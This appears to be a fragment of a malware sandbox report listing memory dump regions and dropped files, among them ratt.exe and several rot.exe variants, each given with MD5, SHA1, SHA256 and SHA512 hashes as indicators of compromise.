memory/4408-290-0x0000000004AC0000-0x0000000004B5C000-memory.dmp
memory/2084-293-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/4408-292-0x0000000004B60000-0x0000000004BF2000-memory.dmp
memory/4408-294-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/4408-295-0x0000000004E80000-0x0000000004E8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | d873512e243ae188374228802a175714 |
| SHA1 | ea3c7c16219780c6ba92eb9f1d9c463efa964e6e |
| SHA256 | cde7323e6dc76e111b0d048f50e1d3f6d9c8a6eb10483cddb2b6bf2e703c9856 |
| SHA512 | 3134d5965e51326ab2416bb41add5cc67b012a5ba5b8e44fefe254624d0ece9efd83ed6fcf47b59644cc092d897a4fcf5736e1a445c13179af70fd60dbbe8d3a |
memory/4720-297-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/4720-298-0x0000000000430000-0x00000000005E6000-memory.dmp
memory/4720-299-0x00000000059F0000-0x0000000005A00000-memory.dmp
memory/4408-300-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/4408-301-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/4408-302-0x0000000004D00000-0x0000000004D10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log
| MD5 | 9a2d0ce437d2445330f2646472703087 |
| SHA1 | 33c83e484a15f35c2caa3af62d5da6b7713a20ae |
| SHA256 | 30ea2f716e85f8d14a201e3fb0897d745a01b113342dfb7a9b7ac133c4ef150c |
| SHA512 | a61d18d90bfad9ea8afdfa37537cfea3d5a3d0c161e323fa65840c283bdc87c3de85daaff5519beea2f2719eec1c68398eea8679b55ff733a61052f073162d5d |
C:\Users\Admin\Music\rot.exe
| MD5 | 5c1cb0cc5d6da0a4540184587daca3c2 |
| SHA1 | 46297cbe9654aa34de744d6924db0176cb670d77 |
| SHA256 | 6c11a6d2f520c125099436f3e4d63a2676c51de699527bcebc54c8bb3e37095c |
| SHA512 | 4a7ecb33abaaa4ac166b7c4962f20b93bc14d9549ad4fd3960202ca34c641957a72c5f5f09dfa7235eb134c7c70d37034e4ddfc3bbba56a5b502293dccd0c5f7 |
C:\Users\Admin\Music\rot.exe
| MD5 | eb14cbe0aa96ba29651b2a8be6fd2b79 |
| SHA1 | 088c06cd809d0c2a1fdf2b23b967fdc8e27c20e7 |
| SHA256 | 2c176a5ebe06323f5d3269d98f90d05a595c6d70e0e497f4ee5544e931f16746 |
| SHA512 | 7135a1ebe1561ab2745dc12c499793e799930c186507f1a6a4ff3a78549e15b89295ca97d00023c63eb9fb8efc8002adbefcd6c63ab37cb434baa7db23bbeb96 |
C:\Users\Admin\Music\rot.exe
| MD5 | 4741768e7c2e7056840407f2ff30e259 |
| SHA1 | 16dfcb6e210c9c68f2975aa7e8b227007e4d7117 |
| SHA256 | 280fae9a30d6aa4f2baca0844a9a689080cb8827501a3cd7d62f1d54cfe91cc3 |
| SHA512 | 7cd32a3d02ffd87b134a62739854fa1fbf33068fb04b7dac85485dad03b0be8d67a7ce21da18f71c6d1c39979c2c3929ecbe4f672ee0ea77879dbfaade0028fb |
memory/4680-320-0x0000000000400000-0x000000000045E000-memory.dmp